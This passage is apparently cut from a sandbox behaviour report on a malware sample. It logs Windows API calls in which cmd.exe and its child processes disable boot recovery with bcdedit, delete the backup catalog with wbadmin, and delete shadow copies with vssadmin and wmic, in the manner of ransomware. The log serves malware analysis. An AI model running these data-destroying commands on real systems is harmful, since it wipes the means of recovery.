UpdateProcThreadAttribute (in: lpAttributeList=0x1cf098, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf048, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cf098, lpPreviousValue=0x0) returned 1 [0204.362] GetStartupInfoW (in: lpStartupInfo=0x1cf1b0 | out: lpStartupInfo=0x1cf1b0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0204.362] GetProcessHeap () returned 0x310000 [0204.362] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x20) returned 0x32af20 [0204.362] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0204.362] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0204.362] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0204.362] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0204.362] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0204.362] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0204.362] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0204.362] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0204.363] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0204.363] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0204.363] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0204.363] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0204.363] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0204.363] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0204.363] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0204.363] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0204.363] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0204.363] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0204.363] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.363] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.363] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.363] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.363] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.363] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.363] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.363] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.363] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0204.363] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0204.363] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0204.363] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0204.363] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0204.363] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0204.363] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0204.363] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0204.363] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0204.364] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0204.364] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0204.364] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0204.364] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0204.364] GetProcessHeap () returned 0x310000 [0204.364] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x32af20 | out: hHeap=0x310000) returned 1 [0204.364] GetProcessHeap () returned 0x310000 [0204.364] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x12) returned 0x32a1e0 [0204.364] lstrcmpW (lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1 [0204.364] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="bcdedit /set {default} recoveryenabled no ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1cf0d0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="bcdedit /set {default} recoveryenabled no ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf080 | out: lpCommandLine="bcdedit /set {default} recoveryenabled no ", lpProcessInformation=0x1cf080*(hProcess=0x50, hThread=0x54, dwProcessId=0xb80, dwThreadId=0xb7c)) returned 1 [0204.367] CloseHandle (hObject=0x54) returned 1 [0204.367] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0204.367] GetProcessHeap () returned 0x310000 [0204.367] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x32b840 | out: hHeap=0x310000) returned 1 [0204.367] GetEnvironmentStringsW () returned 0x32b840* [0204.367] GetProcessHeap () returned 0x310000 [0204.367] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xb0e) returned 0x332ad0 [0204.367] FreeEnvironmentStringsW (penv=0x32b840) returned 1 [0204.367] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0204.421] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1cefc8 | out: lpExitCode=0x1cefc8*=0x0) returned 1 [0204.421] CloseHandle (hObject=0x50) returned 1 [0204.421] _vsnwprintf (in: _Buffer=0x1cf238, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cefd8 | out: _Buffer="00000000") returned 8 [0204.421] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0204.421] GetProcessHeap () returned 0x310000 [0204.421] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x332ad0 | out: hHeap=0x310000) returned 1 [0204.421] GetEnvironmentStringsW () returned 0x32b840* [0204.421] GetProcessHeap () returned 0x310000 [0204.421] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xb0e) returned 0x332ad0 [0204.421] FreeEnvironmentStringsW (penv=0x32b840) returned 1 [0204.421] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0204.421] GetProcessHeap () returned 0x310000 [0204.421] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x332ad0 | out: hHeap=0x310000) returned 1 [0204.421] GetEnvironmentStringsW () returned 0x32b840* [0204.422] GetProcessHeap () returned 0x310000 [0204.422] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xb0e) returned 0x332ad0 [0204.422] FreeEnvironmentStringsW (penv=0x32b840) returned 1 [0204.422] GetProcessHeap () returned 0x310000 [0204.422] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x32a1e0 | out: hHeap=0x310000) returned 1 [0204.422] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cf098 | out: lpAttributeList=0x1cf098) [0204.422] GetConsoleTitleW (in: lpConsoleTitle=0x1cf790, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0204.422] GetProcessHeap () returned 0x310000 [0204.422] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x218) returned 0x32c7d0 [0204.422] GetProcessHeap () returned 0x310000 [0204.422] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x4e) returned 0x325f00 [0204.422] GetProcessHeap () returned 0x310000 [0204.422] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x420) returned 0x32c9f0 [0204.422] SetErrorMode (uMode=0x0) returned 0x0 [0204.422] SetErrorMode (uMode=0x1) returned 0x0 [0204.422] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x32ca00, lpFilePart=0x1cf020 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1cf020*="Desktop") returned 0x25 [0204.422] SetErrorMode (uMode=0x0) returned 0x1 [0204.423] GetProcessHeap () returned 0x310000 [0204.423] RtlReAllocateHeap (Heap=0x310000, Flags=0x0, Ptr=0x32c9f0, Size=0x6c) returned 0x32c9f0 [0204.423] GetProcessHeap () returned 0x310000 [0204.423] RtlSizeHeap (HeapHandle=0x310000, Flags=0x0, MemoryPointer=0x32c9f0) returned 0x6c [0204.423] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a0cf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0204.423] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0204.423] GetProcessHeap () returned 0x310000 [0204.423] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x128) returned 0x32ca70 [0204.423] GetProcessHeap () returned 0x310000 [0204.423] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x240) returned 0x32cba0 [0204.423] GetProcessHeap () returned 0x310000 [0204.423] RtlReAllocateHeap (Heap=0x310000, Flags=0x0, Ptr=0x32cba0, Size=0x12a) returned 0x32cba0 [0204.423] GetProcessHeap () returned 0x310000 [0204.423] RtlSizeHeap (HeapHandle=0x310000, Flags=0x0, MemoryPointer=0x32cba0) returned 0x12a [0204.423] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a0cf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0204.423] GetProcessHeap () returned 0x310000 [0204.423] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xe8) returned 0x32cce0 [0204.423] GetProcessHeap () returned 0x310000 [0204.423] RtlReAllocateHeap (Heap=0x310000, Flags=0x0, Ptr=0x32cce0, Size=0x7e) returned 0x32cce0 [0204.423] GetProcessHeap () returned 0x310000 [0204.423] RtlSizeHeap (HeapHandle=0x310000, Flags=0x0, MemoryPointer=0x32cce0) returned 0x7e [0204.423] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.423] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x1ced90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced90) returned 0xffffffffffffffff [0204.424] GetLastError () returned 0x2 [0204.424] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wbadmin", fInfoLevelId=0x1, lpFindFileData=0x1ced90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced90) returned 0xffffffffffffffff [0204.424] GetLastError () returned 0x2 [0204.424] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.424] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x1ced90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced90) returned 0x32cd70 [0204.424] FindClose (in: hFindFile=0x32cd70 | out: hFindFile=0x32cd70) returned 1 [0204.424] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wbadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x1ced90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced90) returned 0xffffffffffffffff [0204.424] GetLastError () returned 0x2 [0204.424] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wbadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x1ced90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced90) returned 0x32cd70 [0204.425] FindClose (in: hFindFile=0x32cd70 | out: hFindFile=0x32cd70) returned 1 [0204.425] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0204.425] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0204.425] GetConsoleTitleW (in: lpConsoleTitle=0x1cf2e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0204.425] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cf098, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf058 | out: lpAttributeList=0x1cf098, lpSize=0x1cf058) returned 1 [0204.425] UpdateProcThreadAttribute (in: lpAttributeList=0x1cf098, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf048, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cf098, lpPreviousValue=0x0) returned 1 [0204.425] GetStartupInfoW (in: lpStartupInfo=0x1cf1b0 | out: lpStartupInfo=0x1cf1b0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0204.425] GetProcessHeap () returned 0x310000 [0204.425] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x20) returned 0x32af20 [0204.425] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0204.425] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0204.425] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0204.425] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0204.425] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0204.425] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0204.425] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0204.425] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0204.426] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0204.426] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0204.426] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0204.426] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0204.426] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0204.426] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0204.426] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0204.426] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0204.426] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0204.426] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0204.426] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.426] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.426] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.426] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.426] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.426] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.426] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.426] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.426] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0204.426] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0204.426] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0204.426] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0204.426] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0204.426] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0204.426] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0204.426] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0204.426] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0204.426] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0204.426] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0204.427] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0204.427] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0204.427] GetProcessHeap () returned 0x310000 [0204.427] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x32af20 | out: hHeap=0x310000) returned 1 [0204.427] GetProcessHeap () returned 0x310000 [0204.427] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x12) returned 0x32a1e0 [0204.427] lstrcmpW (lpString1="\\wbadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0204.427] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\wbadmin.exe", lpCommandLine="wbadmin delete catalog -quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1cf0d0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wbadmin delete catalog -quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf080 | out: lpCommandLine="wbadmin delete catalog -quiet", lpProcessInformation=0x1cf080*(hProcess=0x54, hThread=0x50, dwProcessId=0x4e8, dwThreadId=0xb44)) returned 1 [0205.519] CloseHandle (hObject=0x50) returned 1 [0205.519] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0205.519] GetProcessHeap () returned 0x310000 [0205.519] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x332ad0 | out: hHeap=0x310000) returned 1 [0205.519] GetEnvironmentStringsW () returned 0x32b840* [0205.519] GetProcessHeap () returned 0x310000 [0205.519] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xb0e) returned 0x332ad0 [0205.519] FreeEnvironmentStringsW (penv=0x32b840) returned 1 [0205.519] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) Process: id = "3" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x1faf7000" os_pid = "0xac4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x754" cmd_line = "vssadmin delete shadows /all /quiet " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 26 os_tid = 0x5a8 Thread: id = 27 os_tid = 0x6fc Thread: id = 28 os_tid = 0x54c Thread: id = 29 os_tid = 0x5c4 Thread: id = 30 os_tid = 0xaec Process: id = "4" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x1c732000" os_pid = "0xb14" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005a657" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 31 os_tid = 0xb30 Thread: id = 32 os_tid = 0xb68 Thread: id = 33 os_tid = 0xba8 Thread: id = 34 os_tid = 0xb50 [0085.986] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xd4dac0 | out: lpSystemTimeAsFileTime=0xd4dac0*(dwLowDateTime=0x78923840, dwHighDateTime=0x1d6047d)) [0085.986] GetCurrentProcessId () returned 0xb14 [0085.986] GetCurrentThreadId () returned 0xb50 [0085.986] GetTickCount () returned 0x114d7f8 [0085.987] QueryPerformanceCounter (in: lpPerformanceCount=0xd4dac8 | out: lpPerformanceCount=0xd4dac8*=20608851675) returned 1 [0085.987] malloc (_Size=0x100) returned 0x168e80 Thread: id = 35 os_tid = 0xb60 Thread: id = 36 os_tid = 0xb34 Thread: id = 37 os_tid = 0xb64 Thread: id = 52 os_tid = 0x34c Thread: id = 320 os_tid = 0xf48 Thread: id = 391 os_tid = 0xadc Process: id = "5" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x972d000" os_pid = "0xc8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dde1" [0xc000000f], "LOCAL" [0x7] Thread: id = 38 os_tid = 0xa54 Thread: id = 39 os_tid = 0x768 Thread: id = 40 os_tid = 0x764 Thread: id = 41 os_tid = 0x758 Thread: id = 42 os_tid = 0x724 Thread: id = 43 os_tid = 0x718 Thread: id = 44 os_tid = 0x714 Thread: id = 45 os_tid = 0x154 Thread: id = 46 os_tid = 0x150 Thread: id = 47 os_tid = 0x120 Thread: id = 48 os_tid = 0x124 Thread: id = 49 os_tid = 0x118 Thread: id = 50 os_tid = 0xf0 Thread: id = 51 os_tid = 0x324 Thread: id = 317 os_tid = 0xf24 Process: id = "6" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x2337000" os_pid = "0x5f4" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005b327" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 53 os_tid = 0x5e4 Thread: id = 54 os_tid = 0x1c4 Thread: id = 55 os_tid = 0x5e0 Thread: id = 56 os_tid = 0xb84 Thread: id = 57 os_tid = 0xb88 Thread: id = 58 os_tid = 0x35c Thread: id = 321 os_tid = 0xf50 Thread: id = 390 os_tid = 0x4d4 Process: id = "7" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x4fbff000" os_pid = "0xef8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x754" cmd_line = "wmic shadowcopy delete " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 322 os_tid = 0xa44 [0179.606] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf970 | out: lpSystemTimeAsFileTime=0x1cf970*(dwLowDateTime=0xaf602080, dwHighDateTime=0x1d6047d)) [0179.606] GetCurrentProcessId () returned 0xef8 [0179.606] GetCurrentThreadId () returned 0xa44 [0179.606] GetTickCount () returned 0x1163f23 [0179.606] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf978 | out: lpPerformanceCount=0x1cf978*=29970832436) returned 1 [0179.608] GetModuleHandleW (lpModuleName=0x0) returned 0xff580000 [0179.608] __set_app_type (_Type=0x1) [0179.608] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff5cced0) returned 0x0 [0179.609] __wgetmainargs (in: _Argc=0xff5f2380, _Argv=0xff5f2390, _Env=0xff5f2388, _DoWildCard=0, _StartInfo=0xff5f239c | out: _Argc=0xff5f2380, _Argv=0xff5f2390, _Env=0xff5f2388) returned 0 [0179.611] ??0CHString@@QEAA@XZ () returned 0xff5f2ab0 [0179.613] malloc (_Size=0x30) returned 0x2a5a80 [0179.614] malloc (_Size=0x70) returned 0x2a7ab0 [0179.614] malloc (_Size=0x50) returned 0x2a5ac0 [0179.614] malloc (_Size=0x30) returned 0x2a7b30 [0179.614] malloc (_Size=0x48) returned 0x2a7b70 [0179.614] malloc (_Size=0x30) returned 